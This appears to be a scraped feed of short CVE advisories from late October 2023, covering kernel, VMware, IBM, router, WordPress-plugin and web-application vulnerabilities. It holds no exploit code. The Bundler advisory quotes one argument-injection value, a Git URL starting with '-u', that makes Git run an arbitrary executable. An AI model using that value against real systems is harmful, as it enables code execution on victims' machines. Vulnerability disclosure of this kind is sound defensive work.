| 2023-10-29 06:22:28 |
🚨 CVE-2023-35823An issue was discovered in the Linux kernel before 6.3.2. A use-after-free was found in saa7134_finidev in drivers/media/pci/saa7134/saa7134-core.c.🎖@cveNotify |
|
| 2023-10-29 00:52:14 |
🚨 CVE-2023-46854Proxmox proxmox-widget-toolkit before 4.0.9, as used in multiple Proxmox products, allows XSS via the edit notes feature.🎖@cveNotify |
|
| 2023-10-29 00:52:12 |
🚨 CVE-2023-5836A vulnerability was found in SourceCodester Task Reminder System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file classes/Users.php?f=delete. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The identifier of this vulnerability is VDB-243800.🎖@cveNotify |
|
| 2023-10-29 00:52:10 |
🚨 CVE-2023-5837A vulnerability classified as problematic was found in AlexanderLivanov FotosCMS2 up to 2.4.3. This vulnerability affects unknown code of the file profile.php of the component Cookie Handler. The manipulation of the argument username leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-243802 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-28 21:22:11 |
🚨 CVE-2023-4863Heap buffer overflow in libwebp in Google Chrome prior to 116.0.5845.187 and libwebp 1.3.2 allowed a remote attacker to perform an out of bounds memory write via a crafted HTML page. (Chromium security severity: Critical)🎖@cveNotify |
|
| 2023-10-28 11:22:09 |
🚨 CVE-2023-46215Insertion of Sensitive Information into Log File vulnerability in Apache Airflow Celery provider, Apache Airflow.Sensitive information logged as clear text when rediss, amqp, rpc protocols are used as Celery result backendNote: the vulnerability is about the information exposed in the logs not about accessing the logs.This issue affects Apache Airflow Celery provider: from 3.3.0 through 3.4.0; Apache Airflow: from 1.10.0 through 2.6.3.Users are recommended to upgrade Airflow Celery provider to version 3.4.1 and Apache Airlfow to version 2.7.0 which fixes the issue.🎖@cveNotify |
|
| 2023-10-28 11:22:02 |
🚨 CVE-2019-13990initDocumentParser in xml/XMLSchedulingDataProcessor.java in Terracotta Quartz Scheduler through 2.3.0 allows XXE attacks via a job description.🎖@cveNotify |
|
| 2023-10-28 05:52:13 |
🚨 CVE-2023-5693A vulnerability was found in CodeAstro Internet Banking System 1.0 and classified as critical. This issue affects some unknown processing of the file pages_reset_pwd.php. The manipulation of the argument email leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-243131.🎖@cveNotify |
|
| 2023-10-28 05:52:12 |
🚨 CVE-2023-43067Dell Unity prior to 5.3 contains an XML External Entity injection vulnerability. An XXE attack could potentially exploit this vulnerability disclosing local files in the file system.🎖@cveNotify |
|
| 2023-10-28 05:52:10 |
🚨 CVE-2023-5683A vulnerability was found in Beijing Baichuo Smart S85F Management Platform up to 20231010 and classified as critical. This issue affects some unknown processing of the file /sysmanage/importconf.php. The manipulation of the argument btn_file_renew leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-243059. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-10-28 05:52:09 |
🚨 CVE-2023-46055An issue in ThingNario Photon v.1.0 allows a remote attacker to execute arbitrary code and escalate privileges via a crafted script to the ping function to the "thingnario Logger Maintenance Webpage" endpoint.🎖@cveNotify |
|
| 2023-10-28 05:52:08 |
🚨 CVE-2023-34045VMware Fusion(13.x prior to 13.5) contains a local privilege escalation vulnerability that occurs during installation for the first time (the user needs to drag or copy the application to a folder from the '.dmg' volume) or when installing an upgrade. A malicious actor with local non-administrative user privileges may exploit this vulnerability to escalate privileges to root on the system where Fusion is installed or being installed for the first time.🎖@cveNotify |
|
| 2023-10-28 05:52:07 |
🚨 CVE-2023-34044VMware Workstation( 17.x prior to 17.5) and Fusion(13.x prior to 13.5) contain an out-of-bounds read vulnerability that exists in the functionality for sharing host Bluetooth devices with the virtual machine. A malicious actor with local administrative privileges on a virtual machine may be able to read privileged information contained in hypervisor memory from a virtual machine.🎖@cveNotify |
|
| 2023-10-28 05:52:06 |
🚨 CVE-2023-34046VMware Fusion(13.x prior to 13.5) contains a TOCTOU (Time-of-check Time-of-use) vulnerability that occurs during installation for the first time (the user needs to drag or copy the application to a folder from the '.dmg' volume) or when installing an upgrade. A malicious actor with local non-administrative user privileges may exploit this vulnerability to escalate privileges to root on the system where Fusion is installed or being installed for the first time.🎖@cveNotify |
|
| 2023-10-28 05:52:04 |
🚨 CVE-2023-5523Execution of downloaded content flaw in M-Files Web Companion before release version 23.10 and LTS Service Release Versions before 23.8 LTS SR1 allows Remote Code Execution🎖@cveNotify |
|
| 2023-10-28 05:52:03 |
🚨 CVE-2023-33837IBM Security Verify Governance 10.0 does not encrypt sensitive or critical information before storage or transmission. IBM X-Force ID: 256020.🎖@cveNotify |
|
| 2023-10-28 05:52:02 |
🚨 CVE-2023-43045IBM Sterling Partner Engagement Manager 6.1.2, 6.2.0, and 6.2.2 could allow a remote user to perform unauthorized actions due to improper authentication. IBM X-Force ID: 266896.🎖@cveNotify |
|
| 2023-10-28 05:51:59 |
🚨 CVE-2023-33840IBM Security Verify Governance 10.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 256037.🎖@cveNotify |
|
| 2023-10-28 05:51:58 |
🚨 CVE-2023-33839IBM Security Verify Governance 10.0 could allow a remote authenticated attacker to execute arbitrary commands on the system by sending a specially crafted request. IBM X-Force ID: 256036.🎖@cveNotify |
|
| 2023-10-28 05:51:56 |
🚨 CVE-2023-20598An improper privilege management in the AMD Radeon™ Graphics driver may allow an authenticated attacker to craft an IOCTL request to gain I/O control over arbitrary hardware ports or physical addresses resulting in a potential arbitrary code execution.🎖@cveNotify |
|
| 2023-10-27 20:22:58 |
🚨 CVE-2023-38276IBM Cognos Dashboards on Cloud Pak for Data 4.7.0 exposes sensitive information in environment variables which could aid in further attacks against the system. IBM X-Force ID: 260736.🎖@cveNotify |
|
| 2023-10-27 20:22:57 |
🚨 CVE-2023-38735IBM Cognos Dashboards on Cloud Pak for Data 4.7.0 could allow a remote attacker to bypass security restrictions, caused by a reverse tabnabbing flaw. An attacker could exploit this vulnerability and redirect a victim to a phishing site. IBM X-Force ID: 262482.🎖@cveNotify |
|
| 2023-10-27 20:22:53 |
🚨 CVE-2022-34886A remote code execution vulnerability was found in the firmware used in some Lenovo printers, which can be caused by a remote user pushing an illegal string to the server-side interface via a script, resulting in a stack overflow.🎖@cveNotify |
|
| 2023-10-27 20:22:51 |
🚨 CVE-2022-34887Standard users can directly operate and set printer configuration information , such as IP, in some Lenovo Printers without having to authenticate with the administrator password.🎖@cveNotify |
|
| 2023-10-27 20:22:49 |
🚨 CVE-2022-3429A denial-of-service vulnerability was found in the firmware used in Lenovo printers, where users send illegal or malformed strings to an open port, triggering a denial of service that causes a display error and prevents the printer from functioning properly.🎖@cveNotify |
|
| 2023-10-27 20:22:46 |
🚨 CVE-2023-27854An arbitrary code execution vulnerability was reported to Rockwell Automation in Arena Simulation that could potentially allow a malicious user to commit unauthorized arbitrary code to the software by using a memory buffer overflow. The threat-actor could then execute malicious code on the system affecting the confidentiality, integrity, and availability of the product. The user would need to open a malicious file provided to them by the attacker for the code to execute.🎖@cveNotify |
|
| 2023-10-27 20:22:43 |
🚨 CVE-2023-27858Rockwell Automation Arena Simulation contains an arbitrary code execution vulnerability that could potentially allow a malicious user to commit unauthorized code to the software by using an uninitialized pointer in the application. The threat-actor could then execute malicious code on the system affecting the confidentiality, integrity, and availability of the product. The user would need to open a malicious file provided to them by the attacker for the code to execute.🎖@cveNotify |
|
| 2023-10-27 20:22:39 |
🚨 CVE-2023-46246Vim is an improved version of the good old UNIX editor Vi. Heap-use-after-free in memory allocated in the function `ga_grow_inner` in in the file `src/alloc.c` at line 748, which is freed in the file `src/ex_docmd.c` in the function `do_cmdline` at line 1010 and then used again in `src/cmdhist.c` at line 759. When using the `:history` command, it's possible that the provided argument overflows the accepted value. Causing an Integer Overflow and potentially later an use-after-free. This vulnerability has been patched in version 9.0.2068.🎖@cveNotify |
|
| 2023-10-27 20:22:36 |
🚨 CVE-2023-46289Rockwell Automation FactoryTalk View Site Edition insufficiently validates user input, which could potentially allow threat actors to send malicious data bringing the product offline. If exploited, the product would become unavailable and require a restart to recover resulting in a denial-of-service condition.🎖@cveNotify |
|
| 2023-10-27 20:22:32 |
🚨 CVE-2023-46290Due to inadequate code logic, a previously unauthenticated threat actor could potentially obtain a local Windows OS user token through the FactoryTalk® Services Platform web service and then use the token to log in into FactoryTalk® Services Platform . This vulnerability can only be exploited if the authorized user did not previously log in into the FactoryTalk® Services Platform web service.🎖@cveNotify |
|
| 2023-10-27 20:22:29 |
🚨 CVE-2023-4967Denial of Service in NetScaler ADC and NetScaler Gateway when configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA Virtual Server🎖@cveNotify |
|
| 2023-10-27 20:22:25 |
🚨 CVE-2023-45498VinChin Backup & Recovery v5.0.*, v6.0.*, v6.7.*, and v7.0.* was discovered to contain a command injection vulnerability.🎖@cveNotify |
|
| 2023-10-27 20:22:22 |
🚨 CVE-2023-45499VinChin Backup & Recovery v5.0.*, v6.0.*, v6.7.*, and v7.0.* was discovered to contain hardcoded credentials.🎖@cveNotify |
|
| 2023-10-27 20:22:19 |
🚨 CVE-2023-36478Eclipse Jetty provides a web server and servlet container. In versions 11.0.0 through 11.0.15, 10.0.0 through 10.0.15, and 9.0.0 through 9.4.52, an integer overflow in `MetaDataBuilder.checkSize` allows for HTTP/2 HPACK header values toexceed their size limit. `MetaDataBuilder.java` determines if a header name or value exceeds the size limit, and throws an exception if the limit is exceeded. However, when length is very large and huffman is true, the multiplication by 4 in line 295will overflow, and length will become negative. `(_size+length)` will now be negative, and the check on line 296 will not be triggered. Furthermore, `MetaDataBuilder.checkSize` allows for user-entered HPACK header value sizes to be negative, potentially leading to a very large buffer allocation later on when the user-entered size is multiplied by 2. This means that if a user provides a negative length value (or, more precisely, a length value which, when multiplied by the 4/3 fudge factor, is negative), and this length value is a very large positive number when multiplied by 2, then the user can cause a very large buffer to be allocated on the server. Users of HTTP/2 can be impacted by a remote denial of service attack. The issue has been fixed in versions 11.0.16, 10.0.16, and 9.4.53. There are no known workarounds.🎖@cveNotify |
|
| 2023-10-27 20:22:17 |
🚨 CVE-2023-3823In PHP versions 8.0.* before 8.0.30, 8.1.* before 8.1.22, and 8.2.* before 8.2.8 various XML functions rely on libxml global state to track configuration variables, like whether external entities are loaded. This state is assumed to be unchanged unless the user explicitly changes it by calling appropriate function. However, since the state is process-global, other modules - such as ImageMagick - may also use this library within the same process, and change that global state for their internal purposes, and leave it in a state where external entities loading is enabled. This can lead to the situation where external XML is parsed with external entities loaded, which can lead to disclosure of any local files accessible to PHP. This vulnerable state may persist in the same process across many requests, until the process is shut down.🎖@cveNotify |
|
| 2023-10-27 20:22:14 |
🚨 CVE-2023-3824In PHP version 8.0.* before 8.0.30, 8.1.* before 8.1.22, and 8.2.* before 8.2.8, when loading phar file, while reading PHAR directory entries, insufficient length checking may lead to a stack buffer overflow, leading potentially to memory corruption or RCE.🎖@cveNotify |
|
| 2023-10-27 20:22:12 |
🚨 CVE-2023-5576The Migration, Backup, Staging - WPvivid plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 0.9.91 via Google Drive API secrets stored in plaintext in the publicly visible plugin source. This could allow unauthenticated attackers to impersonate the WPVivid Google Drive account via the API if they can trick a user into reauthenticating via another vulnerability or social engineering.🎖@cveNotify |
|
| 2023-10-27 20:22:09 |
🚨 CVE-2020-36758The RSS Aggregator by Feedzy plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.4.2. This is due to missing or incorrect nonce validation on the save_feedzy_post_type_meta() function. This makes it possible for unauthenticated attackers to update post meta via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-10-27 20:22:06 |
🚨 CVE-2020-36759The Woody code snippets plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.3.9. This is due to missing or incorrect nonce validation on the runActions() function. This makes it possible for unauthenticated attackers to activate and deactivate snippets via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-10-27 20:22:03 |
🚨 CVE-2021-4418The Custom CSS, JS & PHP plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.0.7. This is due to missing or incorrect nonce validation on the save() function. This makes it possible for unauthenticated attackers to save code snippets via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-10-27 14:52:12 |
🚨 CVE-2023-44376Online Art Gallery v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'add2' parameter of the header.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-10-27 14:52:10 |
🚨 CVE-2023-44377Online Art Gallery v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'add3' parameter of the header.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-10-27 14:52:08 |
🚨 CVE-2023-5807Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in TRtek Software Education Portal allows SQL Injection.This issue affects Education Portal: before 3.2023.29.🎖@cveNotify |
|
| 2023-10-27 14:52:06 |
🚨 CVE-2022-3979A vulnerability was found in NagVis up to 1.9.33 and classified as problematic. This issue affects the function checkAuthCookie of the file share/server/core/classes/CoreLogonMultisite.php. The manipulation of the argument hash leads to incorrect type conversion. The attack may be initiated remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. Upgrading to version 1.9.34 is able to address this issue. The identifier of the patch is 7574fd8a2903282c2e0d1feef5c4876763db21d5. It is recommended to upgrade the affected component. The identifier VDB-213557 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-27 14:52:05 |
🚨 CVE-2021-43809`Bundler` is a package for managing application dependencies in Ruby. In `bundler` versions before 2.2.33, when working with untrusted and apparently harmless `Gemfile`'s, it is not expected that they lead to execution of external code, unless that's explicit in the ruby code inside the `Gemfile` itself. However, if the `Gemfile` includes `gem` entries that use the `git` option with invalid, but seemingly harmless, values with a leading dash, this can be false. To handle dependencies that come from a Git repository instead of a registry, Bundler uses various commands, such as `git clone`. These commands are being constructed using user input (e.g. the repository URL). When building the commands, Bundler versions before 2.2.33 correctly avoid Command Injection vulnerabilities by passing an array of arguments instead of a command string. However, there is the possibility that a user input starts with a dash (`-`) and is therefore treated as an optional argument instead of a positional one. This can lead to Code Execution because some of the commands have options that can be leveraged to run arbitrary executables. Since this value comes from the `Gemfile` file, it can contain any character, including a leading dash.To exploit this vulnerability, an attacker has to craft a directory containing a `Gemfile` file that declares a dependency that is located in a Git repository. This dependency has to have a Git URL in the form of `-u./payload`. This URL will be used to construct a Git clone command but will be interpreted as the upload-pack argument. Then this directory needs to be shared with the victim, who then needs to run a command that evaluates the Gemfile, such as `bundle lock`, inside.This vulnerability can lead to Arbitrary Code Execution, which could potentially lead to the takeover of the system. However, the exploitability is very low, because it requires a lot of user interaction. Bundler 2.2.33 has patched this problem by inserting `--` as an argument before any positional arguments to those Git commands that were affected by this issue. Regardless of whether users can upgrade or not, they should review any untrustred `Gemfile`'s before running any `bundler` commands that may read them, since they can contain arbitrary ruby code.🎖@cveNotify |
|
| 2023-10-27 14:52:03 |
🚨 CVE-2023-5152** UNSUPPPORTED WHEN ASSIGNED ** ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, has been found in D-Link DAR-7000 and DAR-8000 up to 20151231. Affected by this issue is some unknown functionality of the file /importexport.php. The manipulation of the argument sql leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-240248. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.🎖@cveNotify |
|
| 2023-10-27 14:52:01 |
🚨 CVE-2023-5570Improper Protection for Outbound Error Messages and Alert Signals vulnerability in Inohom Home Manager Gateway allows Account Footprinting.This issue affects Home Manager Gateway: before v.1.27.12.🎖@cveNotify |
|
| 2023-10-27 14:52:00 |
🚨 CVE-2023-5705The VK Filter Search plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'vk_filter_search' shortcode in all versions up to, and including, 2.3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-10-27 14:51:59 |
🚨 CVE-2023-5820The Thumbnail Slider With Lightbox plugin for WordPress is vulnerable to Cross-Site Request Forgery in version 1.0. This is due to missing or incorrect nonce validation on the addedit functionality. This makes it possible for unauthenticated attackers to upload arbitrary files via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-10-27 14:51:57 |
🚨 CVE-2023-5821The Thumbnail carousel slider plugin for WordPress is vulnerable to Cross-Site Request Forgery in version 1.0. This is due to missing nonce validation on the deleteselected function. This makes it possible for unauthenticated attackers to delete sliders in bulk via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-10-27 12:21:57 |
🚨 CVE-2023-5774The Animated Counters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-10-27 12:21:56 |
🚨 CVE-2023-5817The Neon text plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's neontext_box shortcode in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping on user supplied attributes (color). This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2023-10-27 11:21:58 |
🚨 CVE-2023-34057VMware Tools contains a local privilege escalation vulnerability. A malicious actor with local user access to a guest virtual machine may elevate privileges within the virtual machine.🎖@cveNotify |
|
| 2023-10-27 11:21:57 |
🚨 CVE-2023-34058VMware Tools contains a SAML token signature bypass vulnerability. A malicious actor that has been granted Guest Operation Privileges https://docs.vmware.com/en/VMware-vSphere/8.0/vsphere-security/GUID-6A952214-0E5E-4CCF-9D2A-90948FF643EC.html in a target virtual machine may be able to elevate their privileges if that target virtual machine has been assigned a more privileged Guest Alias https://vdc-download.vmware.com/vmwb-repository/dcr-public/d1902b0e-d479-46bf-8ac9-cee0e31e8ec0/07ce8dbd-db48-4261-9b8f-c6d3ad8ba472/vim.vm.guest.AliasManager.html .🎖@cveNotify |
|
| 2023-10-27 11:21:56 |
🚨 CVE-2023-34059open-vm-tools contains a file descriptor hijack vulnerability in the vmware-user-suid-wrapper. A malicious actor with non-root privileges may be able to hijack the /dev/uinput file descriptor allowing them to simulate user inputs.🎖@cveNotify |
|
| 2023-10-27 01:22:44 |
🚨 CVE-2023-45679stb_vorbis is a single file MIT licensed library for processing ogg vorbis files. A crafted file may trigger memory allocation failure in `start_decoder`. In that case the function returns early, but some of the pointers in `f->comment_list` are left initialized and later `setup_free` is called on these pointers in `vorbis_deinit`. This issue may lead to code execution.🎖@cveNotify |
|
| 2023-10-27 01:22:42 |
🚨 CVE-2023-46536TP-LINK TL-WR886N V7.0_3.0.14_Build_221115_Rel.56908n.bin was discovered to contain a stack overflow via the function chkRegVeriRegister.🎖@cveNotify |
|
| 2023-10-27 01:22:41 |
🚨 CVE-2023-46537TP-LINK TL-WR886N V7.0_3.0.14_Build_221115_Rel.56908n.bin was discovered to contain a stack overflow via the function getRegVeriRegister.🎖@cveNotify |
|
| 2023-10-27 01:22:38 |
🚨 CVE-2023-46539TP-LINK TL-WR886N V7.0_3.0.14_Build_221115_Rel.56908n.bin was discovered to contain a stack overflow via the function registerRequestHandle.🎖@cveNotify |
|
| 2023-10-27 01:22:36 |
🚨 CVE-2023-46538TP-LINK TL-WR886N V7.0_3.0.14_Build_221115_Rel.56908n.bin was discovered to contain a stack overflow via the function chkResetVeriRegister.🎖@cveNotify |
|
| 2023-10-27 01:22:33 |
🚨 CVE-2023-46527TP-LINK TL-WR886N V7.0_3.0.14_Build_221115_Rel.56908n.bin was discovered to contain a stack overflow via the function bindRequestHandle.🎖@cveNotify |
|
| 2023-10-27 01:22:31 |
🚨 CVE-2023-46521TP-LINK TL-WR886N V7.0_3.0.14_Build_221115_Rel.56908n.bin was discovered to contain a stack overflow via the function RegisterRegister.🎖@cveNotify |
|
| 2023-10-27 01:22:28 |
🚨 CVE-2023-46534TP-LINK TL-WR886N V7.0_3.0.14_Build_221115_Rel.56908n.bin was discovered to contain a stack overflow via the function modifyAccPwdRegister.🎖@cveNotify |
|
| 2023-10-27 01:22:26 |
🚨 CVE-2023-46522TP-LINK TL-WR886N V7.0_3.0.14_Build_221115_Rel.56908n.bin was discovered to contain a stack overflow via the function deviceInfoRegister.🎖@cveNotify |
|
| 2023-10-27 01:22:24 |
🚨 CVE-2023-46535TP-LINK TL-WR886N V7.0_3.0.14_Build_221115_Rel.56908n.bin was discovered to contain a stack overflow via the function getResetVeriRegister.🎖@cveNotify |
|
| 2023-10-27 01:22:22 |
🚨 CVE-2023-46523TP-LINK TL-WR886N V7.0_3.0.14_Build_221115_Rel.56908n.bin was discovered to contain a stack overflow via the function upgradeInfoRegister.🎖@cveNotify |
|
| 2023-10-27 01:22:19 |
🚨 CVE-2023-46525TP-LINK TL-WR886N V7.0_3.0.14_Build_221115_Rel.56908n.bin was discovered to contain a stack overflow via the function loginRegister.🎖@cveNotify |
|
| 2023-10-27 01:22:16 |
🚨 CVE-2023-46526TP-LINK TL-WR886N V7.0_3.0.14_Build_221115_Rel.56908n.bin was discovered to contain a stack overflow via the function resetCloudPwdRegister.🎖@cveNotify |
|
| 2023-10-27 01:22:13 |
🚨 CVE-2023-46520TP-LINK TL-WR886N V7.0_3.0.14_Build_221115_Rel.56908n.bin was discovered to contain a stack overflow via the function uninstallPluginReqHandle.🎖@cveNotify |
|
| 2023-10-27 01:22:09 |
🚨 CVE-2018-16739An issue was discovered on certain ABUS TVIP devices. Due to a path traversal in /opt/cgi/admin/filewrite, an attacker can write to files, and thus execute code arbitrarily with root privileges.🎖@cveNotify |
|
| 2023-10-27 01:22:07 |
🚨 CVE-2018-17558Hardcoded manufacturer credentials and an OS command injection vulnerability in the /cgi-bin/mft/ directory on ABUS TVIP TVIP20050 LM.1.6.18, TVIP10051 LM.1.6.18, TVIP11050 MG.1.6.03.05, TVIP20550 LM.1.6.18, TVIP10050 LM.1.6.18, TVIP11550 MG.1.6.03, TVIP21050 MG.1.6.03, and TVIP51550 MG.1.6.03 cameras allow remote attackers to execute code as root.🎖@cveNotify |
|
| 2023-10-27 01:22:05 |
🚨 CVE-2018-17559Due to incorrect access control, unauthenticated remote attackers can view the /video.mjpg video stream of certain ABUS TVIP cameras.🎖@cveNotify |
|
| 2023-10-27 01:22:03 |
🚨 CVE-2018-17878Buffer Overflow vulnerability in certain ABUS TVIP cameras allows attackers to gain control of the program via crafted string sent to sprintf() function.🎖@cveNotify |
|
| 2023-10-27 01:22:01 |
🚨 CVE-2018-17879An issue was discovered on certain ABUS TVIP cameras. The CGI scripts allow remote attackers to execute code via system() as root. There are several injection points in various scripts.🎖@cveNotify |
|
| 2023-10-27 01:21:58 |
🚨 CVE-2023-38328An issue was discovered in eGroupWare 17.1.20190111. An Improper Password Storage vulnerability affects the setup panel of under setup/manageheader.php, which allows authenticated remote attackers with administrator credentials to read a cleartext database password.🎖@cveNotify |
|
| 2023-10-26 22:53:32 |
🚨 CVE-2022-2943The WordPress Infinite Scroll – Ajax Load More plugin for Wordpress is vulnerable to arbitrary file reading in versions up to, and including, 5.5.3 due to insufficient file path validation on the alm_repeaters_export() function. This makes it possible for authenticated attackers, with administrative privileges, to download arbitrary files hosted on the server that may contain sensitive content, such as the wp-config.php file.🎖@cveNotify |
|
| 2023-10-26 22:53:20 |
🚨 CVE-2023-4132A use-after-free vulnerability was found in the siano smsusb module in the Linux kernel. The bug occurs during device initialization when the siano device is plugged in. This flaw allows a local user to crash the system, causing a denial of service condition.🎖@cveNotify |
|
| 2023-10-26 22:53:18 |
🚨 CVE-2023-3863A use-after-free flaw was found in nfc_llcp_find_local in net/nfc/llcp_core.c in NFC in the Linux kernel. This flaw allows a local user with special privileges to impact a kernel information leak issue.🎖@cveNotify |
|
| 2023-10-26 22:53:15 |
🚨 CVE-2023-3611An out-of-bounds write vulnerability in the Linux kernel's net/sched: sch_qfq component can be exploited to achieve local privilege escalation.The qfq_change_agg() function in net/sched/sch_qfq.c allows an out-of-bounds write because lmax is updated according to packet sizes without bounds checks.We recommend upgrading past commit 3e337087c3b5805fe0b8a46ba622a962880b5d64.🎖@cveNotify |
|
| 2023-10-26 22:53:12 |
🚨 CVE-2023-3389A use-after-free vulnerability in the Linux Kernel io_uring subsystem can be exploited to achieve local privilege escalation.Racing a io_uring cancel poll request with a linked timeout can cause a UAF in a hrtimer.We recommend upgrading past commit ef7dfac51d8ed961b742218f526bd589f3900a59 (4716c73b188566865bdd79c3a6709696a224ac04 for 5.10 stable and 0e388fce7aec40992eadee654193cad345d62663 for 5.15 stable).🎖@cveNotify |
|
| 2023-10-26 22:53:11 |
🚨 CVE-2023-3338A null pointer dereference flaw was found in the Linux kernel's DECnet networking protocol. This issue could allow a remote user to crash the system.🎖@cveNotify |
|
| 2023-10-26 22:53:08 |
🚨 CVE-2023-3268An out of bounds (OOB) memory access flaw was found in the Linux kernel in relay_file_read_start_pos in kernel/relay.c in the relayfs. This flaw could allow a local attacker to crash the system or leak kernel internal information.🎖@cveNotify |
|
| 2023-10-26 22:53:06 |
🚨 CVE-2023-21967Vulnerability in the Oracle Java SE, Oracle GraalVM Enterprise Edition product of Oracle Java SE (component: JSSE). Supported versions that are affected are Oracle Java SE: 8u361, 8u361-perf, 11.0.18, 17.0.6, 20; Oracle GraalVM Enterprise Edition: 20.3.9, 21.3.5 and 22.3.1. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTPS to compromise Oracle Java SE, Oracle GraalVM Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Java SE, Oracle GraalVM Enterprise Edition. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs. CVSS 3.1 Base Score 5.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H).🎖@cveNotify |
|
| 2023-10-26 22:53:03 |
🚨 CVE-2023-3212A NULL pointer dereference issue was found in the gfs2 file system in the Linux kernel. It occurs on corrupt gfs2 file systems when the evict code tries to reference the journal descriptor structure after it has been freed and set to NULL. A privileged local user could use this flaw to cause a kernel panic.🎖@cveNotify |
|
| 2023-10-26 22:53:00 |
🚨 CVE-2023-0897Sielco PolyEco1000 is vulnerable to a session hijack vulnerability due to the cookie being vulnerable to a brute force attack, lack of SSL, and the session being visible in requests.🎖@cveNotify |
|
| 2023-10-26 22:52:58 |
🚨 CVE-2023-39427In Ashlar-Vellum Cobalt, Xenon, Argon, Lithium, and Cobalt Share v12 SP0 Build (1204.77), the affected applications lack proper validation of user-supplied data when parsing XE files. This could lead to an out-of-bounds write. An attacker could leverage this vulnerability to execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2023-10-26 22:52:55 |
🚨 CVE-2023-39936In Ashlar-Vellum Graphite v13.0.48, the affected application lacks proper validation of user-supplied data when parsing VC6 files. This could lead to an out-of-bounds read. An attacker could leverage this vulnerability to execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2023-10-26 22:52:53 |
🚨 CVE-2023-44267Online Art Gallery v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The 'lnm' parameter of the header.php resource does not validate the characters received and they are sent unfiltered to the database.🎖@cveNotify |
|
| 2023-10-26 22:52:50 |
🚨 CVE-2023-46661Sielco PolyEco1000 is vulnerable to an attacker escalating their privileges by modifying passwords in POST requests.🎖@cveNotify |
|
| 2023-10-26 22:52:47 |
🚨 CVE-2023-46662Sielco PolyEco1000 is vulnerable to an information disclosure vulnerability due to improper access control enforcement. An unauthenticated remote attacker can exploit this via a specially crafted request to gain access to sensitive information.🎖@cveNotify |
|
| 2023-10-26 22:52:44 |
🚨 CVE-2023-5754Sielco PolyEco1000 uses a weak set of default administrative credentials that can be easily guessed in remote password attacks and gain full control of the system.🎖@cveNotify |
|
| 2023-10-26 22:52:41 |
🚨 CVE-2023-5804A vulnerability was found in PHPGurukul Nipah Virus Testing Management System 1.0 and classified as critical. This issue affects some unknown processing of the file login.php. The manipulation of the argument username leads to sql injection. The attack may be initiated remotely. The identifier VDB-243617 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-26 22:52:38 |
🚨 CVE-2023-43191SpringbootCMS 1.0 foreground message can be embedded malicious code saved in the database. When users browse the comments, these malicious codes embedded in the HTML will be executed, and the user's browser will be controlled by the attacker, so as to achieve the special purpose of the attacker, such as cookie theft🎖@cveNotify |
|
| 2023-10-26 22:52:36 |
